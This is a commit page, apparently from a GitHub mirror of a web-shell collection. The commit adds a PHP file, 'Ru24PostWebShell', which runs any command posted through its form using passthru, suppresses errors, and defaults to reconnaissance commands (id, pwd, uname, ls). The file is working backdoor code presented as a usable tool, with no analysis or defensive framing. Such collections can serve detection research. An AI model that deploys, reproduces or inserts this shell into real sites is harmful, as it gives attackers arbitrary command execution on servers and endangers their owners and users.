mirror of
https://github.com/tennc/webshell.git
synced 2025-12-25 09:09:01 +00:00
reupdate xakepshell
This commit is contained in:
23
xakep-shells/PHP/ru24_post_sh.php.php.txt
Normal file
23
xakep-shells/PHP/ru24_post_sh.php.php.txt
Normal file
@@ -0,0 +1,23 @@
|
||||
<?php
|
||||
/*
|
||||
Ru24PostWebShell
|
||||
Writed by DreAmeRz
|
||||
|
||||
http://www.ru24-team.net
|
||||
*/
|
||||
error_reporting(0);
|
||||
$function=passthru; // system, exec, cmd
|
||||
echo "<html>
|
||||
<head>
|
||||
<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
|
||||
<meta http-equiv='pragma' content='no-cache'>
|
||||
</head><body>";
|
||||
echo "<form method=post>";
|
||||
echo "<input type=text name=cmd size=85>";
|
||||
echo "</form>";
|
||||
echo "<pre>";
|
||||
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
|
||||
echo "".$function($_POST['cmd'])."</pre></body></html>";
|
||||
|
||||
|
||||
?>
|
||||
Reference in New Issue
Block a user